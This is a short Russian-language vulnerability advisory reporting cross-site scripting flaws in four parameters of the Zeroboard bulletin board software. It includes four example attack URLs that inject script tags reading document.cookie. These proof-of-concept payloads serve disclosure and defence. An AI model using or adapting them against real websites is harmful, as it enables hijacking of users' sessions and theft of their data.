Программа: Zeroboard 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важной информации пользователей.
Уязвимости обнаружены в параметре sn1 функции gallery(), параметре year функции union_schedule(), параметре filename функции view_image.php и параметре page функции id(). Удаленный пользователь может с помощью специально сформированного URL произвести XSS нападение и получить доступ к важной информации пользователей. 

Пример: 

http://[target]/dir/zboard.php?id=gallery&sn1=ALBANIAN%20 RULEZ=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 

http://[target]/zboard/zboard.php?id=union_schdule&year=ALBANIAN%20 RULEZ=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]zboard/skin/dir/view_image.php?filename=ALBANIAN
%20RULEZ=’%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

http://[target]/zboard/zboard.php?id=link&page=ALBANIAN%20
RULEZ=’%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E



Оставить мнение